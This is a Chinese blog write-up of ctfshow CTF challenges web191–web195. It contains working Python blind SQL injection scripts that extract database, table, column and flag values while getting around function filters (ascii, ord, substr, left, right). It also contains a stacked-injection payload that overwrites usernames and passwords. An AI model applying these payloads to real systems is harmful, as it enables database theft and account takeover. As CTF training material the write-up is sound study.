ctfshow-web入门-sql注入(web191-web195)

于 2024-08-07 23:50:44 发布
阅读量860 收藏 4
点赞数 20
分类专栏: SQL ctfshow web 文章标签: sql 数据库 安全 学习 web安全 web mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/141000555
版权
web 同时被 3 个专栏收录
165 篇文章 20 订阅
订阅专栏
ctfshow
66 篇文章 1 订阅
订阅专栏
SQL
21 篇文章 1 订阅
订阅专栏

目录

1、web191

2、web192

3、web193

4、web194

5、web195

1、web191

过滤了 ascii

使用 ord 代替:

import requests
import string
url = "http://a585c278-320a-40e7-841f-109b1e394caa.challenge.ctf.show/api/index.php"
out = ''
for j in range(1, 50):
    print(j)
    for k in range(32, 128):
        # 猜解数据库名
        # data={
        #     'username': f"0'||if(ord(substr(database(),{j},1))={k},1,0)#",
        #     'password': '1'
        # }

        # 猜解表名
        # data={
        #     'username': f"0'||if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{j},1))={k},1,0)#",
        #     'password': '1'
        # }

        # 猜解列名
        # data={
        #     'username': f"0'||if(ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{j},1))={k},1,0)#",
        #     'password': '1'
        # }

        # 猜解 flag
        data = {
            'username': f"0'||if(ord(substr((select f1ag from ctfshow_fl0g),{j},1))={k},1,0)#",
            'password': '1'
        }

        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += chr(k)
            print(out)
            break

拿到 flag:ctfshow{e2e5b2d9-f4f0-4deb-a7ce-17eae6f1133f}

2、web192

ascii 和 ord 都过滤了,那么我们就不转 ASCII 值,直接判断字符:

import requests

url = "http://c330c70b-f24e-49db-816b-ff1641ad269a.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz'
for j in range(1, 50):
    print(j)
    for k in dic:
        data = {
            'username': f"0'||if(substr((select f1ag from ctfshow_fl0g),{j},1)='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

拿到 flag:ctfshow{f77caf71-e424-4082-8eef-299e85fc8fad}

3、web193

新增过滤 substr,使用 mid 代替:

MID() 函数用于从文本字段中提取字符

SELECT MID(column_name[,start,length]) FROM table_name;
参数描述
column_name必需。要提取字符的字段。
start必需。规定开始位置(起始值是 1)。
length可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。

因为这里我直接用上一道题的 payload 查 flag发现不行,应该是名字变了,我们重新从库开始查一遍, 先查数据库名:

import requests

url = "http://06782287-bd3b-4dc1-8cf3-23f2d19ec57c.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz_'
for j in range(1, 50):
    print(j)
    for k in dic:

        # data = {
        #     'username': f"0'||if(substr((select f1ag from ctfshow_fl0g),{j},1)='{k}',1,0)#",
        #     'password': '1'
        # }

        data = {
            'username': f"0'||if(mid(database(),{j},1)='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

数据库名还是叫 ctfshow_web

 

查表名:

注意括号的使用,特别是 payload 里我去掉一些括号发现不行

import requests

url = "http://06782287-bd3b-4dc1-8cf3-23f2d19ec57c.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz_'
for j in range(1, 50):
    print(j)
    for k in dic:
        # 查数据库名
        # data = {
        #     'username': f"0'||if(mid(database(),{j},1)='{k}',1,0)#",
        #     'password': '1'
        # }

        # 查表名
        data = {
            'username': f"0'||if((mid((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow_web'),{j},1))='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

表名为:ctfshow_flxg 

 

查列名:

import requests

url = "http://06782287-bd3b-4dc1-8cf3-23f2d19ec57c.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz_'
for j in range(1, 50):
    print(j)
    for k in dic:
        # 查数据库名
        # data = {
        #     'username': f"0'||if(mid(database(),{j},1)='{k}',1,0)#",
        #     'password': '1'
        # }

        # 查表名
        # data = {
        #     'username': f"0'||if((mid((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow_web'),{j},1))='{k}',1,0)#",
        #     'password': '1'
        # }

        # 查列名
        data = {
            'username': f"0'||if((mid((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{j},1))='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

还是叫:f1ag 

查具体字段信息:

import requests

url = "http://06782287-bd3b-4dc1-8cf3-23f2d19ec57c.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz_'
for j in range(1, 50):
    print(j)
    for k in dic:
        # 查数据库名
        # data = {
        #     'username': f"0'||if(mid(database(),{j},1)='{k}',1,0)#",
        #     'password': '1'
        # }

        # 查表名
        # data = {
        #     'username': f"0'||if((mid((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow_web'),{j},1))='{k}',1,0)#",
        #     'password': '1'
        # }

        # 查列名
        # data = {
        #     'username': f"0'||if((mid((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{j},1))='{k}',1,0)#",
        #     'password': '1'
        # }

        # 查具体字段
        data = {
            'username': f"0'||if((mid((select f1ag from ctfshow_flxg),{j},1))='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

拿到 flag:ctfshow{285a3d83-989e-4627-bec8-1bfb26caf38b}

也可以用 left 函数:

从提供的字符串的左侧提取给定数量的字符,例如 LEFT('SQLServer',3) 返回 SQL。

import requests

url = "http://06782287-bd3b-4dc1-8cf3-23f2d19ec57c.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz_'
for j in range(1, 50):
    print(j)
    for k in dic:
        # 查具体字段
        data = {
            'username': f"0'||if((left((select f1ag from ctfshow_flxg),{j}))='{out+k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

有 left 当然就有 right:

RIGHT () 函数用于从字符串中检索最右边的指定长度的字符,这里稍微改一下结果的拼接方式

import requests

url = "http://06782287-bd3b-4dc1-8cf3-23f2d19ec57c.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz_'
for j in range(1, 50):
    print(j)
    for k in dic:
        # 查具体字段
        data = {
            'username': f"0'||if((right((select f1ag from ctfshow_flxg),{j}))='{k+out}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out = k + out
            print(out)
            break

可以看到结果是倒着输出的 

 

4、web194

新增过滤 left、right

那么还可以用上一题的 mid 函数,直接跑:

 

拿到 flag:ctfshow{f0390ca9-bac9-4fba-8a8d-fd21741cd0eb}

此外,还可以用 lpad 和 rpad:

lpad('123456',2) 结果为 12

lpad('123456',7,'0') 结果为 0123456,左填充到字符串

 因此,我们不指定第三个参数,就可以实现和 left 和 right 一样的效果。

5、web195

进入堆叠注入

密码只能是数字,过滤了空格,采用反引号包裹绕过,题目已经说了是堆叠注入,这里直接修改用户名和密码: 

由查询语句我们可以知道是 username 和 pass 这两个字段 

 

修改用户名和密码都是 1

1;update(ctfshow_user)set`username`=1,`pass`=1;

 

登录:

拿到 flag:ctfshow{8ff140cf-eaba-46f7-a624-c82f326b0056}

Myon⁶
关注
  • 20
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 268
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 334
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
CTFshow--web入门(171-184)
2402_82963715的博客
07-28 599
CTFshow--web入门171-184的wp。
CTFshow-web入门171(sql注入
Hunter909的博客
10-12 143
username若是对于flag就会被屏蔽、隐藏(没有办法去改变username!=flag),但是会发现ID排序是有顺序的,就可以慢慢试id = 25,id = 26......发现id=26时,flag会出来。因为$sql = "select username,password from user where username!这里是具有sql注入漏洞的,它这里没有限定条件,直接运用简单的sql注入把隐藏的flag找出来就行。
ctfshow-web入门-sql注入web171-web175)
Welcome To Myon'Blog !
07-31 1104
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
CTFSHOW-WEB入门-SQL注入
qq_44657899的博客
05-29 8707
文章目录前言web171web172web173web174web175 前言 最近发现对sql注入的相关知识点有点生疏和忘记了,做做ctfhshow的sql注入来巩固和学习一些新姿势。 web171 直接union注入即可 # 判断列数 ' order by 3 --+ # 查数据库名 ' union select 1,2,database() --+ # 查表名 ' union select 1,2,concat(table_name) from information_schema.tables
ctfshow web入门 sql注入 web214--web222
2301_81040377的博客
05-03 398
MySQL用procedure analyse()函数优化表结构。时间盲注,能力有限先全部用别人的吧,说实话脚本是我的心上病。慢就慢吧,总比扫不出来好。
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2051
web227 按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
ctfshow-web入门-sql注入web186-web190)
最新发布
Welcome To Myon'Blog !
08-06 1097
在上一题中我们提到了,使用 true+true 的方法构造出数字比如 true+true+true 就可以构造出 3,再使用 char 函数将数字转为对应的 ASCII 字符,最终实现我们 payload 的转换。在 SQL 中,数字和字符串的比较是弱类型的,如果在比较操作中涉及到字符串和数字,SQL 会尝试将字符串转换为数字,那么只要字符串不是以数字开头,比较时都会转为数字 0。拿到 flag:ctfshow{e54220e0-e81f-4e0e-ad32-0bbbbdd43d83}
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
vue+element-ui+websql
04-19
在“vue+element-ui+websql”这个项目中,开发者选择使用 Vue.js 作为基础框架来构建应用的逻辑和视图层。Vue.js 提供了双向数据绑定、虚拟DOM、指令系统等特性,使得开发者可以轻松地管理应用程序的状态和视图更新...
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf
07-08
论文通过对SQL注入攻击的基本概念和原理、基于Web应用的SQL注入攻击的影响和危害、基于动态查询匹配的SQL注入攻击检测方法、基于Web应用的SQL注入攻击入侵检测系统的设计和实现等方面的研究,旨在解决当前Web应用...
MyCAT-WEB操作手册.doc
11-29
* 范围:MyCAT-WEB 适用于各种类型的数据库管理,包括 MySQL、Oracle、SQL Server 等。 二、准备 * 运行环境:MyCAT-WEB 需要在 Java 环境下运行,要求 Java 1.6 或更高版本。 * 环境变量:需要设置 MYCAT_HOME ...
postgresql 双重排序后 重复项 标识次序
cuisidong1997的博客
08-04 218
在这个查询中,ROW_NUMBER()会为每个product_id分组内的行分配一个唯一的sale_sequence。PARTITION BY product_id表示按product_id分组,ORDER BY sale_date表示在每个分组内按sale_date排序。最外层的ORDER BY product_id, sale_date确定了查询结果的最终排序。一个常见的方法是使用ROW_NUMBER()窗口函数,它会为每个分组内的行分配一个唯一的序号。
postgresql 分组合并 字段
cuisidong1997的博客
08-04 262
如果你想要合并的不是字符串字段,而是其他类型的字段,比如数字或日期,你也可以使用string_agg,但是需要将这些值转换为字符串。在PostgreSQL中,如果你想要将多个行的字段值合并为一个字段,你可以使用string_agg函数。这个函数可以将同一个组内的指定字段的值连接成一个字符串,并且可以自定义连接符。在这个例子中,array_agg将所有的薪资值收集到一个数组中,然后array_to_string将这个数组转换为一个由逗号分隔的字符串。postgresql 分组合并 字段。
自定义SQL Server数据访问层:打造专属数据交互之门
2401_85763803的博客
08-04 662
在软件开发中,数据访问层(Data Access Layer, DAL)扮演着至关重要的角色,它作为应用程序与数据库之间的桥梁,负责所有的数据存取操作。SQL Server作为一个强大的关系型数据库管理系统,提供了多种机制来实现数据访问层。本文将指导你如何在SQL Server中构建一个高效、可维护的自定义数据访问层。执行SQL语句:包括查询(SELECT)、插入(INSERT)、更新(UPDATE)和删除(DELETE)操作。事务管理:确保数据的一致性和完整性。错误处理。
力扣SQL50 修复表中的名字 字符串函数
人言束负
08-03 355
【代码】力扣SQL50 修复表中的名字 字符串函数。
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了防止SQL注入攻击,应该使用参数化查询并对用户输入进行严格验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值